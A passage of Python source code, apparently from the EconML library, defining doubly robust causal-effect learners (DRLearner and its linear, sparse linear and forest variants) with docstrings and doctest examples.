[array([ 1.472..., 0.001..., -0.011..., 0.698..., 2.049...]),
array([ 1.455..., -0.002..., 0.005..., 0.677..., 1.998...])]
>>> [mdl.coef_ for mdls in est.models_propensity for mdl in mdls]
[array([[-0.747..., 0.153..., -0.018...],
[ 0.083..., -0.110..., -0.076...],
[ 0.663..., -0.043... , 0.094...]]),
array([[-1.048..., 0.000..., 0.032...],
[ 0.019..., 0.124..., -0.081...],
[ 1.029..., -0.124..., 0.049...]])]
Beyond default models:
.. testcode::
from sklearn.linear_model import LassoCV
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from econml.dr import DRLearner
np.random.seed(123)
X = np.random.normal(size=(1000, 3))
T = np.random.binomial(2, scipy.special.expit(X[:, 0]))
sigma = 0.01
y = (1 + .5*X[:, 0]) * T + X[:, 0] + np.random.normal(0, sigma, size=(1000,))
est = DRLearner(model_propensity=RandomForestClassifier(n_estimators=100, min_samples_leaf=10),
model_regression=RandomForestRegressor(n_estimators=100, min_samples_leaf=10),
model_final=LassoCV(cv=3),
featurizer=None)
est.fit(y, T, X=X, W=None)
>>> est.score_
1.7...
>>> est.const_marginal_effect(X[:3])
array([[0.68..., 1.10...],
[0.56..., 0.79...],
[0.34..., 0.10...]])
>>> est.model_cate(T=2).coef_
array([0.74..., 0. , 0. ])
>>> est.model_cate(T=2).intercept_
1.9...
>>> est.model_cate(T=1).coef_
array([0.24..., 0.00..., 0. ])
>>> est.model_cate(T=1).intercept_
0.94...
Attributes
----------
score_ : float
The MSE in the final doubly robust potential outcome regressions, i.e.
.. math::
\\frac{1}{n_t} \\sum_{t=1}^{n_t} \\frac{1}{n} \\sum_{i=1}^n (Y_{i, t}^{DR} - \\hat{\\theta}_t(X_i))^2
where n_t is the number of treatments (excluding control).
If `sample_weight` is not None at fit time, then a weighted average across samples is returned.
"""
def __init__(self, *,
model_propensity='auto',
model_regression='auto',
model_final=StatsModelsLinearRegression(),
multitask_model_final=False,
featurizer=None,
min_propensity=1e-6,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
random_state=None):
self.model_propensity = clone(model_propensity, safe=False)
self.model_regression = clone(model_regression, safe=False)
self.model_final = clone(model_final, safe=False)
self.multitask_model_final = multitask_model_final
self.featurizer = clone(featurizer, safe=False)
self.min_propensity = min_propensity
super().__init__(cv=cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
discrete_treatment=True,
discrete_instrument=False, # no instrument, so doesn't matter
categories=categories,
random_state=random_state)
def _get_inference_options(self):
options = super()._get_inference_options()
if not self.multitask_model_final:
options.update(auto=GenericModelFinalInferenceDiscrete)
else:
options.update(auto=lambda: None)
return options
def _gen_ortho_learner_model_nuisance(self):
if self.model_propensity == 'auto':
model_propensity = LogisticRegressionCV(cv=3, solver='lbfgs', multi_class='auto',
random_state=self.random_state)
else:
model_propensity = clone(self.model_propensity, safe=False)
if self.model_regression == 'auto':
model_regression = WeightedLassoCVWrapper(cv=3, random_state=self.random_state)
else:
model_regression = clone(self.model_regression, safe=False)
return _ModelNuisance(model_propensity, model_regression, self.min_propensity)
def _gen_featurizer(self):
return clone(self.featurizer, safe=False)
def _gen_model_final(self):
return clone(self.model_final, safe=False)
def _gen_ortho_learner_model_final(self):
return _ModelFinal(self._gen_model_final(), self._gen_featurizer(), self.multitask_model_final)
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, freq_weight=None, sample_var=None, groups=None,
cache_values=False, inference='auto'):
"""
Estimate the counterfactual model from data, i.e. estimates function :math:`\\theta(\\cdot)`.
Parameters
----------
Y: (n,) vector of length n
Outcomes for each sample
T: (n,) vector of length n
Treatments for each sample
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample
sample_weight : (n,) array like, default None
Individual weights for each sample. If None, it assumes equal weight.
freq_weight: (n,) array like of integers, default None
Weight for the observation. Observation i is treated as the mean
outcome of freq_weight[i] independent observations.
When ``sample_var`` is not None, this should be provided.
sample_var : (n,) nd array like, default None
Variance of the outcome(s) of the original freq_weight[i] observations that were used to
compute the mean outcome represented by observation i.
groups: (n,) vector, optional
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string, :class:`.Inference` instance, or None
Method for performing inference. This estimator supports 'bootstrap'
(or an instance of :class:`.BootstrapInference`).
Returns
-------
self: DRLearner instance
"""
# Replacing fit from _OrthoLearner, to enforce Z=None and improve the docstring
return super().fit(Y, T, X=X, W=W,
sample_weight=sample_weight, freq_weight=freq_weight, sample_var=sample_var, groups=groups,
cache_values=cache_values, inference=inference)
def refit_final(self, *, inference='auto'):
return super().refit_final(inference=inference)
refit_final.__doc__ = _OrthoLearner.refit_final.__doc__
def score(self, Y, T, X=None, W=None, sample_weight=None):
"""
Score the fitted CATE model on a new data set. Generates nuisance parameters
for the new data set based on the fitted residual nuisance models created at fit time.
It uses the mean prediction of the models fitted by the different crossfit folds.
Then calculates the MSE of the final residual Y on residual T regression.
If model_final does not have a score method, then it raises an :exc:`.AttributeError`
Parameters
----------
Y: (n,) vector of length n
Outcomes for each sample
T: (n,) vector of length n
Treatments for each sample
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample
sample_weight: optional(n,) vector or None (Default=None)
Weights for each samples
Returns
-------
score: float
The MSE of the final CATE model on the new data.
"""
# Replacing score from _OrthoLearner, to enforce Z=None and improve the docstring
return super().score(Y, T, X=X, W=W, sample_weight=sample_weight)
@property
def multitask_model_cate(self):
"""
Get the fitted final CATE model.
Returns
-------
multitask_model_cate: object of type(`model_final`)
An instance of the model_final object that was fitted after calling fit which corresponds whose
vector of outcomes correspond to the CATE model for each treatment, compared to baseline.
Available only when multitask_model_final=True.
"""
if not self.ortho_learner_model_final_._multitask_model_final:
raise AttributeError("Separate CATE models were fitted for each treatment! Use model_cate.")
return self.ortho_learner_model_final_.model_cate
def model_cate(self, T=1):
"""
Get the fitted final CATE model.
Parameters
----------
T: alphanumeric
The treatment with respect to which we want the fitted CATE model.
Returns
-------
model_cate: object of type(model_final)
An instance of the model_final object that was fitted after calling fit which corresponds
to the CATE model for treatment T=t, compared to baseline. Available when multitask_model_final=False.
"""
if self.ortho_learner_model_final_._multitask_model_final:
raise AttributeError("A single multitask model was fitted for all treatments! Use multitask_model_cate.")
_, T = self._expand_treatments(None, T)
ind = inverse_onehot(T).item() - 1
assert ind >= 0, "No model was fitted for the control"
return self.ortho_learner_model_final_.models_cate[ind]
@property
def models_propensity(self):
"""
Get the fitted propensity models.
Returns
-------
models_propensity: nested list of objects of type(`model_propensity`)
A nested list of instances of the `model_propensity` object. Number of sublist equals to number of
monte carlo iterations, each element in the sublist corresponds to a crossfitting
fold and is the model instance that was fitted for that training fold.
"""
return [[mdl._model_propensity for mdl in mdls] for mdls in super().models_nuisance_]
@property
def models_regression(self):
"""
Get the fitted regression models.
Returns
-------
model_regression: nested list of objects of type(`model_regression`)
A nested list of instances of the model_regression object. Number of sublist equals to number of
monte carlo iterations, each element in the sublist corresponds to a crossfitting
fold and is the model instance that was fitted for that training fold.
"""
return [[mdl._model_regression for mdl in mdls] for mdls in super().models_nuisance_]
@property
def nuisance_scores_propensity(self):
"""Gets the score for the propensity model on out-of-sample training data"""
return self.nuisance_scores_[0]
@property
def nuisance_scores_regression(self):
"""Gets the score for the regression model on out-of-sample training data"""
return self.nuisance_scores_[1]
@property
def featurizer_(self):
"""
Get the fitted featurizer.
Returns
-------
featurizer: object of type(`featurizer`)
An instance of the fitted featurizer that was used to preprocess X in the final CATE model training.
Available only when featurizer is not None and X is not None.
"""
return self.ortho_learner_model_final_._featurizer
def cate_feature_names(self, feature_names=None):
"""
Get the output feature names.
Parameters
----------
feature_names: list of strings of length X.shape[1] or None
The names of the input features. If None and X is a dataframe, it defaults to the column names
from the dataframe.
Returns
-------
out_feature_names: list of strings or None
The names of the output features :math:`\\phi(X)`, i.e. the features with respect to which the
final CATE model for each treatment is linear. It is the names of the features that are associated
with each entry of the :meth:`coef_` parameter. Available only when the featurizer is not None and has
a method: `get_feature_names(feature_names)`. Otherwise None is returned.
"""
if self._d_x is None:
# Handles the corner case when X=None but featurizer might be not None
return None
if feature_names is None:
feature_names = self._input_names["feature_names"]
if self.featurizer_ is None:
return feature_names
return get_feature_names_or_default(self.featurizer_, feature_names)
@property
def model_final_(self):
return self.ortho_learner_model_final_._model_final
@property
def fitted_models_final(self):
return self.ortho_learner_model_final_.models_cate
def shap_values(self, X, *, feature_names=None, treatment_names=None, output_names=None, background_samples=100):
if self.ortho_learner_model_final_._multitask_model_final:
return _shap_explain_multitask_model_cate(self.const_marginal_effect, self.multitask_model_cate, X,
self._d_t, self._d_y,
featurizer=self.featurizer_,
feature_names=feature_names,
treatment_names=treatment_names,
output_names=output_names,
input_names=self._input_names,
background_samples=background_samples)
else:
return _shap_explain_model_cate(self.const_marginal_effect, self.fitted_models_final,
X, self._d_t, self._d_y,
featurizer=self.featurizer_,
feature_names=feature_names,
treatment_names=treatment_names,
output_names=output_names,
input_names=self._input_names,
background_samples=background_samples)
shap_values.__doc__ = LinearCateEstimator.shap_values.__doc__
class LinearDRLearner(StatsModelsCateEstimatorDiscreteMixin, DRLearner):
"""
Special case of the :class:`.DRLearner` where the final stage
is a Linear Regression on a low dimensional set of features. In this case, inference
can be performed via the asymptotic normal characterization of the estimated parameters.
This is computationally faster than bootstrap inference. To do this, just leave the setting ``inference='auto'``
unchanged, or explicitly set ``inference='statsmodels'`` or alter the covariance type calculation via
``inference=StatsModelsInferenceDiscrete(cov_type='HC1)``.
More concretely, this estimator assumes that the final cate model for each treatment takes a linear form:
.. math ::
\\theta_t(X) = \\left\\langle \\theta_t, \\phi(X) \\right\\rangle + \\beta_t
where :math:`\\phi(X)` is the outcome features of the featurizers, or `X` if featurizer is None. :math:`\\beta_t`
is an intercept of the CATE, which is included if ``fit_cate_intercept=True`` (Default). It fits this by
running a standard ordinary linear regression (OLS), regressing the doubly robust outcome differences on X:
.. math ::
\\min_{\\theta_t, \\beta_t}\
E_n\\left[\\left(Y_{i, t}^{DR} - Y_{i, 0}^{DR}\
- \\left\\langle \\theta_t, \\phi(X_i) \\right\\rangle - \\beta_t\\right)^2\\right]
Then inference can be performed via standard approaches for inference of OLS, via asympotic normal approximations
of the estimated parameters. The default covariance estimator used is heteroskedasticity robust (HC1).
For other methods see :class:`.StatsModelsInferenceDiscrete`. Use can invoke them by setting:
``inference=StatsModelsInferenceDiscrete(cov_type=...)``.
This approach is valid even if the CATE model is not linear in :math:`\\phi(X)`. In this case it performs
inference on the best linear approximation of the CATE model.
Parameters
----------
model_propensity : scikit-learn classifier or 'auto', optional (default='auto')
Estimator for Pr[T=t | X, W]. Trained by regressing treatments on (features, controls) concatenated.
Must implement `fit` and `predict_proba` methods. The `fit` method must be able to accept X and T,
where T is a shape (n, ) array.
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be chosen.
model_regression : scikit-learn regressor or 'auto', optional (default='auto')
Estimator for E[Y | X, W, T]. Trained by regressing Y on (features, controls, one-hot-encoded treatments)
concatenated. The one-hot-encoding excludes the baseline treatment. Must implement `fit` and
`predict` methods. If different models per treatment arm are desired, see the
:class:`.MultiModelWrapper` helper class.
If 'auto' :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV` will be chosen.
featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
min_propensity : float, optional, default ``1e-6``
The minimum propensity at which to clip propensity estimates to avoid dividing by zero.
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional (default is 2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(X,T)` to generate the splits.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
Examples
--------
A simple example with the default models:
.. testcode::
:hide:
import numpy as np
import scipy.special
np.set_printoptions(suppress=True)
.. testcode::
from econml.dr import DRLearner, LinearDRLearner
np.random.seed(123)
X = np.random.normal(size=(1000, 3))
T = np.random.binomial(2, scipy.special.expit(X[:, 0]))
y = (1 + .5*X[:, 0]) * T + X[:, 0] + np.random.normal(size=(1000,))
est = LinearDRLearner()
est.fit(y, T, X=X, W=None)
>>> est.effect(X[:3])
array([ 0.409743..., 0.312604..., -0.127394...])
>>> est.effect_interval(X[:3])
(array([ 0.065306..., -0.182074..., -0.765901...]), array([0.754180..., 0.807284..., 0.511113...]))
>>> est.coef_(T=1)
array([ 0.450779..., -0.003214... , 0.063884... ])
>>> est.coef__interval(T=1)
(array([ 0.155111..., -0.246272..., -0.136827...]), array([0.746447..., 0.239844..., 0.264595...]))
>>> est.intercept_(T=1)
0.88425066...
>>> est.intercept__interval(T=1)
(0.64868548..., 1.11981585...)
Attributes
----------
score_ : float
The MSE in the final doubly robust potential outcome regressions, i.e.
.. math::
\\frac{1}{n_t} \\sum_{t=1}^{n_t} \\frac{1}{n} \\sum_{i=1}^n (Y_{i, t}^{DR} - \\hat{\\theta}_t(X_i))^2
where n_t is the number of treatments (excluding control).
If `sample_weight` is not None at fit time, then a weighted average across samples is returned.
"""
def __init__(self, *,
model_propensity='auto',
model_regression='auto',
featurizer=None,
fit_cate_intercept=True,
min_propensity=1e-6,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
random_state=None):
self.fit_cate_intercept = fit_cate_intercept
super().__init__(model_propensity=model_propensity,
model_regression=model_regression,
model_final=None,
featurizer=featurizer,
multitask_model_final=False,
min_propensity=min_propensity,
categories=categories,
cv=cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
random_state=random_state)
def _gen_model_final(self):
return StatsModelsLinearRegression(fit_intercept=self.fit_cate_intercept)
def _gen_ortho_learner_model_final(self):
return _ModelFinal(self._gen_model_final(), self._gen_featurizer(), False)
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, freq_weight=None, sample_var=None, groups=None,
cache_values=False, inference='auto'):
"""
Estimate the counterfactual model from data, i.e. estimates function :math:`\\theta(\\cdot)`.
Parameters
----------
Y: (n,) vector of length n
Outcomes for each sample
T: (n,) vector of length n
Treatments for each sample
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample
sample_weight : (n,) array like, default None
Individual weights for each sample. If None, it assumes equal weight.
freq_weight: (n,) array like of integers, default None
Weight for the observation. Observation i is treated as the mean
outcome of freq_weight[i] independent observations.
When ``sample_var`` is not None, this should be provided.
sample_var : (n,) nd array like, default None
Variance of the outcome(s) of the original freq_weight[i] observations that were used to
compute the mean outcome represented by observation i.
groups: (n,) vector, optional
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string, :class:`.Inference` instance, or None
Method for performing inference. This estimator supports ``'bootstrap'``
(or an instance of :class:`.BootstrapInference`) and ``'statsmodels'``
(or an instance of :class:`.StatsModelsInferenceDiscrete`).
Returns
-------
self: DRLearner instance
"""
# Replacing fit from DRLearner, to add statsmodels inference in docstring
return super().fit(Y, T, X=X, W=W,
sample_weight=sample_weight, freq_weight=freq_weight, sample_var=sample_var, groups=groups,
cache_values=cache_values, inference=inference)
@property
def fit_cate_intercept_(self):
return self.model_final_.fit_intercept
@property
def multitask_model_cate(self):
# Replacing this method which is invalid for this class, so that we make the
# dosctring empty and not appear in the docs.
return super().multitask_model_cate
@property
def multitask_model_final(self):
return False
@multitask_model_final.setter
def multitask_model_final(self, value):
if value:
raise ValueError("Parameter `multitask_model_final` cannot change from `False` for this estimator!")
@property
def model_final(self):
return self._gen_model_final()
@model_final.setter
def model_final(self, model):
if model is not None:
raise ValueError("Parameter `model_final` cannot be altered for this estimator!")
class SparseLinearDRLearner(DebiasedLassoCateEstimatorDiscreteMixin, DRLearner):
"""
Special case of the :class:`.DRLearner` where the final stage
is a Debiased Lasso Regression. In this case, inference can be performed via the debiased lasso approach
and its asymptotic normal characterization of the estimated parameters. This is computationally
faster than bootstrap inference. Leave the default ``inference='auto'`` unchanged, or explicitly set
``inference='debiasedlasso'`` at fit time to enable inference via asymptotic normality.
More concretely, this estimator assumes that the final cate model for each treatment takes a linear form:
.. math ::
\\theta_t(X) = \\left\\langle \\theta_t, \\phi(X) \\right\\rangle + \\beta_t
where :math:`\\phi(X)` is the outcome features of the featurizers, or `X` if featurizer is None. :math:`\\beta_t`
is a an intercept of the CATE, which is included if ``fit_cate_intercept=True`` (Default). It fits this by
running a debiased lasso regression (i.e. :math:`\\ell_1`-penalized regression with debiasing),
regressing the doubly robust outcome differences on X: i.e. first solves the penalized square loss problem
.. math ::
\\min_{\\theta_t, \\beta_t}\
E_n\\left[\\left(Y_{i, t}^{DR} - Y_{i, 0}^{DR}\
- \\left\\langle \\theta_t, \\phi(X_i) \\right\\rangle - \\beta_t\\right)^2\\right]\
+ \\lambda \\left\\lVert \\theta_t \\right\\rVert_1
and then adds a debiasing correction to the solution. If alpha='auto' (recommended), then the penalty
weight :math:`\\lambda` is set optimally via cross-validation.
This approach is valid even if the CATE model is not linear in :math:`\\phi(X)`. In this case it performs
inference on the best sparse linear approximation of the CATE model.
Parameters
----------
model_propensity : scikit-learn classifier or 'auto', optional (default='auto')
Estimator for Pr[T=t | X, W]. Trained by regressing treatments on (features, controls) concatenated.
Must implement `fit` and `predict_proba` methods. The `fit` method must be able to accept X and T,
where T is a shape (n, ) array.
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be chosen.
model_regression : scikit-learn regressor or 'auto', optional (default='auto')
Estimator for E[Y | X, W, T]. Trained by regressing Y on (features, controls, one-hot-encoded treatments)
concatenated. The one-hot-encoding excludes the baseline treatment. Must implement `fit` and
`predict` methods. If different models per treatment arm are desired, see the
:class:`.MultiModelWrapper` helper class.
If 'auto' :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV` will be chosen.
featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
alpha: string | float, optional., default 'auto'.
CATE L1 regularization applied through the debiased lasso in the final model.
'auto' corresponds to a CV form of the :class:`DebiasedLasso`.
n_alphas : int, optional, default 100
How many alphas to try if alpha='auto'
alpha_cov : string | float, optional, default 'auto'
The regularization alpha that is used when constructing the pseudo inverse of
the covariance matrix Theta used to for correcting the final state lasso coefficient
in the debiased lasso. Each such regression corresponds to the regression of one feature
on the remainder of the features.
n_alphas_cov : int, optional, default 10
How many alpha_cov to try if alpha_cov='auto'.
max_iter : int, optional, default 1000
The maximum number of iterations in the Debiased Lasso
tol : float, optional, default 1e-4
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel for both `fit` and `predict`.
``None`` means 1 unless in a :func:`joblib.parallel_backend` context.
``-1`` means using all processors.
min_propensity : float, optional, default ``1e-6``
The minimum propensity at which to clip propensity estimates to avoid dividing by zero.
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional, default 2
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(X,T)` to generate the splits.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
Examples
--------
A simple example with the default models:
.. testcode::
:hide:
import numpy as np
import scipy.special
np.set_printoptions(suppress=True)
.. testcode::
from econml.dr import DRLearner, SparseLinearDRLearner
np.random.seed(123)
X = np.random.normal(size=(1000, 3))
T = np.random.binomial(2, scipy.special.expit(X[:, 0]))
y = (1 + .5*X[:, 0]) * T + X[:, 0] + np.random.normal(size=(1000,))
est = SparseLinearDRLearner()
est.fit(y, T, X=X, W=None)
>>> est.effect(X[:3])
array([ 0.41..., 0.31..., -0.12...])
>>> est.effect_interval(X[:3])
(array([-0.02..., -0.29... , -0.84...]), array([0.84..., 0.92..., 0.59...]))
>>> est.coef_(T=1)
array([ 0.45..., -0.00..., 0.06...])
>>> est.coef__interval(T=1)
(array([ 0.20..., -0.23..., -0.17...]), array([0.69..., 0.23..., 0.30...]))
>>> est.intercept_(T=1)
0.88...
>>> est.intercept__interval(T=1)
(0.64..., 1.11...)
Attributes
----------
score_ : float
The MSE in the final doubly robust potential outcome regressions, i.e.
.. math::
\\frac{1}{n_t} \\sum_{t=1}^{n_t} \\frac{1}{n} \\sum_{i=1}^n (Y_{i, t}^{DR} - \\hat{\\theta}_t(X_i))^2
where n_t is the number of treatments (excluding control).
If `sample_weight` is not None at fit time, then a weighted average across samples is returned.
"""
def __init__(self, *,
model_propensity='auto',
model_regression='auto',
featurizer=None,
fit_cate_intercept=True,
alpha='auto',
n_alphas=100,
alpha_cov='auto',
n_alphas_cov=10,
max_iter=1000,
tol=1e-4,
n_jobs=None,
min_propensity=1e-6,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
random_state=None):
self.fit_cate_intercept = fit_cate_intercept
self.alpha = alpha
self.n_alphas = n_alphas
self.alpha_cov = alpha_cov
self.n_alphas_cov = n_alphas_cov
self.max_iter = max_iter
self.tol = tol
self.n_jobs = n_jobs
super().__init__(model_propensity=model_propensity,
model_regression=model_regression,
model_final=None,
featurizer=featurizer,
multitask_model_final=False,
min_propensity=min_propensity,
categories=categories,
cv=cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
random_state=random_state)
def _gen_model_final(self):
return DebiasedLasso(alpha=self.alpha,
n_alphas=self.n_alphas,
alpha_cov=self.alpha_cov,
n_alphas_cov=self.n_alphas_cov,
fit_intercept=self.fit_cate_intercept,
max_iter=self.max_iter,
tol=self.tol,
n_jobs=self.n_jobs,
random_state=self.random_state)
def _gen_ortho_learner_model_final(self):
return _ModelFinal(self._gen_model_final(), self._gen_featurizer(), False)
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, groups=None,
cache_values=False, inference='auto'):
"""
Estimate the counterfactual model from data, i.e. estimates function :math:`\\theta(\\cdot)`.
Parameters
----------
Y: (n,) vector of length n
Outcomes for each sample
T: (n,) vector of length n
Treatments for each sample
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample
sample_weight : (n,) array like or None
Individual weights for each sample. If None, it assumes equal weight.
groups: (n,) vector, optional
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string, :class:`.Inference` instance, or None
Method for performing inference. This estimator supports ``'bootstrap'``
(or an instance of :class:`.BootstrapInference`) and ``'debiasedlasso'``
(or an instance of :class:`.LinearModelInferenceDiscrete`).
Returns
-------
self: DRLearner instance
"""
# TODO: support freq_weight and sample_var in debiased lasso
# Replacing fit from DRLearner, to add debiasedlasso inference in docstring
check_high_dimensional(X, T, threshold=5, featurizer=self.featurizer,
discrete_treatment=self.discrete_treatment,
msg="The number of features in the final model (< 5) is too small for a sparse model. "
"We recommend using the LinearDRLearner for this low-dimensional setting.")
return super().fit(Y, T, X=X, W=W,
sample_weight=sample_weight, groups=groups,
cache_values=cache_values, inference=inference)
@property
def fit_cate_intercept_(self):
return self.model_final_.fit_intercept
@property
def multitask_model_final(self):
return False
@multitask_model_final.setter
def multitask_model_final(self, value):
if value:
raise ValueError("Parameter `multitask_model_final` cannot change from `False` for this estimator!")
@property
def model_final(self):
return self._gen_model_final()
@model_final.setter
def model_final(self, model):
if model is not None:
raise ValueError("Parameter `model_final` cannot be altered for this estimator!")
class ForestDRLearner(ForestModelFinalCateEstimatorDiscreteMixin, DRLearner):
""" Instance of DRLearner with a :class:`~econml.grf.RegressionForest`
as a final model, so as to enable non-parametric inference.
Parameters
----------
model_propensity : scikit-learn classifier
Estimator for Pr[T=t | X, W]. Trained by regressing treatments on (features, controls) concatenated.
Must implement `fit` and `predict_proba` methods. The `fit` method must be able to accept X and T,
where T is a shape (n, ) array.
model_regression : scikit-learn regressor
Estimator for E[Y | X, W, T]. Trained by regressing Y on (features, controls, one-hot-encoded treatments)
concatenated. The one-hot-encoding excludes the baseline treatment. Must implement `fit` and
`predict` methods. If different models per treatment arm are desired, see the
:class:`~econml.utilities.MultiModelWrapper` helper class.
min_propensity : float, optional, default ``1e-6``
The minimum propensity at which to clip propensity estimates to avoid dividing by zero.
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional (Default=2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
n_estimators : integer, optional (default=100)
The total number of trees in the forest. The forest consists of a
forest of sqrt(n_estimators) sub-forests, where each sub-forest
contains sqrt(n_estimators) trees.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of splitting samples required to split an internal node.
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` splitting samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression. After construction the tree is also pruned
so that there are at least min_samples_leaf estimation samples on
each leaf.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the sum total of weights (of all
splitting samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided. After construction
the tree is pruned so that the fraction of the sum total weight
of the estimation samples contained in each leaf node is at
least min_weight_fraction_leaf
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a fraction and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
min_impurity_decrease : float, optional (default=0.)
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of split samples, ``N_t`` is the number of
split samples at the current node, ``N_t_L`` is the number of split samples in the
left child, and ``N_t_R`` is the number of split samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
